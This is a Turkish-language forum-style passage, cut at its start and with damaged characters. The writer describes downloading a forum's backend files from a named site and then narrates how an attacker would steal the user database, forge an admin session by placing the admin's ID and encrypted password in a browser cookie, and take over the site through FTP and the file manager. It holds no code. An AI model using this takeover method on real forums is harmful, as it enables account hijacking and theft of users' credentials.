http://www.tymsah.com/cgibin/ikon3...n/ErrorWords.pm yazmam yeterli. Dan diye ben bu dosyay download edebiliyorum. te ben bylece tm dosyalar download ettim ve grdm ki onun forum ile benim forum farkl versiyon olduundan dosyalar uyumuyor Herneyse ben istediimi aldm ama iyi bir insan olarak. Peki diyelim ki ben kt biriyim ve neler yaparm. lk yapcam i forumun DATABASE dosyasn ele geirmek olacaktr. Bu sayede ben tm forumdaki kullanclara ifrelere ve maillere ulaabilirim. Bu kadar basit! Ha bu ifereler ENCRYPT edilmi olacandan siz okuyamazsnz bunlar. Bunu DECRYPT etmeniz gerekir. Tabii ben okurum bunlar. Olay basit akln kullanacaksn. Kendi bilgisayarmdaki COOKE dosyasn aarm, Forum adminin ID sini ve ENCRYPT edilmi ifresini o databaseden alrm ve kendi COOKE dosyama koyarm. Forumun sayfasna girince bir bakarm ki ADMN olarak forumdaym Daha sonra admin ifresini deitiririm. Sonrada sitenin tama**n hack ederim. Bu da basit en nce aldm ifre ile FTP de bir deneme yaparm. Baktm olmuyor, bu forumlarn File Managerlar var, isteyin dosyay Admin odasndan siliyorsun deiitriyosun falan. Ona girerim ve gerisini siz dnn artk. Bu i bu kadar kolay!